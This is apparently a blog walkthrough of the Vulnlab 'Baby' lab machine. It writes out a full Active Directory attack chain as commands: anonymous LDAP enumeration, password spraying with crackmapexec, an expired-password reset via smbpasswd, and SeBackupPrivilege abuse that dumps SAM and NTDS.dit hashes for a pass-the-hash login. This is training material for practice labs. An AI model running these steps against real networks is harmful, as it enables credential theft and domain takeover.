Vulnlab - Baby

Vulnlab – Baby

In this walk through, we will be going through the Baby room from Vulnlab. This room is rated as Easy on the platform and it consist of extensive LDAP Enumeration to get potential password. Spraying of it reveals STATUS_PASSWORD_MUST_CHANGE error which have to be abused to get initial foothold. For Privilege Escalation, abuse of SeBackupPrivilege is required to get root. So, let’s get started without any delay.

Baby

Machine Info:

TitleBaby
IPaddress10.10.88.179
DifficultyEasy
OSWindows
DescriptionBaby is an Easy Windows machine that requires extensive LDAP Enumeration to get potential password. Spraying of it reveals STATUS_PASSWORD_MUST_CHANGE error which have to be abused to get initial foothold. For Privilege Escalation, abuse of SeBackupPrivilege is required to get root.

Enumeration:

  • I started off with a regular nmap scan along with all TCP port scan and UDP scan. Found multiple ports opened – 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.

$ sudo nmap -sV -sC 10.10.88.179
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:50 IST

Nmap scan report for 10.10.88.179
Host is up (0.25s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-20 18:21:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-20T18:21:49+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-04-19T18:19:35
|_Not valid after:  2024-10-19T18:19:35
|_ssl-date: 2024-04-20T18:22:28+00:00; -1s from scanner time.
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-20T18:21:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.16 seconds

$ sudo nmap -p- -T5 10.10.88.179
[sudo] password for wh1terose: 
Sorry, try again.
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST

Nmap scan report for 10.10.88.179
Host is up (0.17s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
58870/tcp open  unknown
58959/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 320.17 seconds

$ sudo nmap -sU -T5 10.10.88.179
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST

Nmap scan report for 10.10.88.179
Host is up (0.17s latency).
Not shown: 998 open|filtered ports
PORT    STATE SERVICE
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 66.98 seconds

  • Added hostname to my /etc/hosts file.

adding hostname to /etc/hosts

PORT 135 (RPC)

  • Tried to enumerate usernames using RPCclient but got nothing.

RPC Enumeration

PORT 139/445 (SMB)

  • Tried to list shares via Null session Authentication but got nothing.

SMB Enumeration

PORT 389 (LDAP)

  • Tried anonymous access on LDAP. Got a successful hit and dumped the username list of the domain.

ldapsearch -H ldap://10.10.88.179 -x -b "DC=baby,DC=vl" '(objectClass=User)' "sAMAccountName" | grep sAMAccountName

LDAP Enumeration

AS-REP roasting

  • On the found usernames, i tried to perform AS-REP roasting to check if any of the have the Kerberos Pre-Authentiation disabled however found no luck.

AsREP Roasting

  • Next, dumped all the domain information of the users via LDAP. Got a password in the description of user Teresa Bell.

ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*"

Got password of Teresa Bell

  • To check if the password is correct or not and for which user, i sprayed it on the DC using crackmapexec but got 0 successful hit.

crackmapexec smb 10.10.88.179 -u usernames -p BabyStart123! --continue-on-success

crackmapexec password spray

  • Back to the enumeration, i looked again at the LDAP result and found out that there are more users on the domain than i have already captured.

ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*" | grep "#"

LDAP Enumeration

  • I sprayed the password again on the found usernames. Didn’t got a green flag this time as well. However, the password of the user “Caroline.Robinson” has to change.

crackmapexec spray

PORT 5357 (HTTP)

  • Next, looked into the running web server but the index page gives a Service Unavailable error.

Service Unavailable error

Exploitation:

  • As per the LDAP enumeration, i got a “STATUS_PASSWORD_MUST_CHANGE” error. Looked online for this and found out that we can change the password of the user if we have RDP enabled with NLA enabled. I confirmed this using the nmap script.

Resource: https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/

sudo nmap 10.10.88.179 -p 3389 --script rdp-enum-encryption

nmap script scan

  • I tried to RDP into the server using rdesktop however the session failed. So, i moved ahead with another technique that leverages smbpasswd.

smbpasswd -r 10.10.88.179 -U Caroline.Robinson

Old SMB password:BabyStart123!
New SMB password:Password@123!
Retype new SMB password: Password@123!

Password changed for user Caroline.Robinson

Changing password of user Caroline.Robinson

  • Changed the password of user Caroline with the above technique and confirmed it using crackmapexec. Got a green flag now.

crackmapexec smb 10.10.88.179 -u Caroline.Robinson -p "Password@123!"

Got a green flag

  • Next, i sprayed the creds on the WinRM service and it gives me a “Pwn3d” back.

crackmapexec winrm 10.10.88.179 -u Caroline.Robinson -p "Password@123!"

got Pwn3d

  • Got access via Evil-WinRM and captured the user flag.

user flag

Privilege Escalation:

  • I ran the below command and checked the groups and priv the current user is assigned to. Found an interesting entry of SeBackupPrivilege and Backup Operators group.

whoami /all

whoami /all

  • Using the assigned privileges, i copied the SAM and SYSTEM files in my current directory. Next, downloaded both of them to our local machine.

reg save hklm\sam C:\Users\Caroline.Robinson\Desktop\sam

reg save hklm\system C:\Users\Caroline.Robinson\Desktop\system

copied the SAM and SYSTEM files

  • Used secretsdump on the downloaded files to dump the contents within in, revealing the Administrator’s hash.

secretsdump.py -sam sam -system system LOCAL

using secretsdump to dump hashes

  • Next, I tried to Log into the DC using the Admin hash using Pass-the-hash technique with psexec but it failed. That means, the admin hash we have is of local admin instead of the domain admin.

logging as an Administrator but failed

  • So, in order to dump the Domain Admins hash, we will be requiring the NTDS.dit file. To do this, we will create a copy of the C drive and copy the required file with robocopy.

# Set up this shit in temp directory

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

  • Once we are done with the diskshadow file setup. We will use the diskshadow utility to execute the commands and create a new disk.

diskshadow.exe /s c:\temp\diskshadow.txt

  • Next, make backup of C drive using robocopy to our created disk named Z.

cd Z:
cd windows
cd ntds
robocopy /b .\ C:\temp NTDS.dit

  • Save system.bak file as well

cd C:\Temp
reg.exe save hklm\system C:\temp\system.bak

  • Download the files system.bak and NTDS.dit to our local machine and use secrets dump to dump the hashes within it.

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

secretsdump hash dump

  • At last, logged into the DC using Domain Admin hash and captured the root flag to mark the machine as complete.

evil-winrm.rb -i 10.10.88.179 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

root flag

Also Read: PG – Twiggy

Conclusion:

Conclusion

So that was “Baby” for you. We started off with a regular nmap scan and found multiple ports opened – 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, dumped all the domain information of the users via LDAP. Got a password in the description of user Teresa Bell. Sprayed the password on the found usernames through LDAP Enumeration and got STATUS_PASSWORD_MUST_CHANGE error. Abused the same and changed the password of the user to get initial foothold. For Privilege Escalation, abuse of SeBackupPrivilege was done to dump the NTDS.dit and system.bak files which then was used to dump the hashes via secretsdump. At last, used the dumped admin hash to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top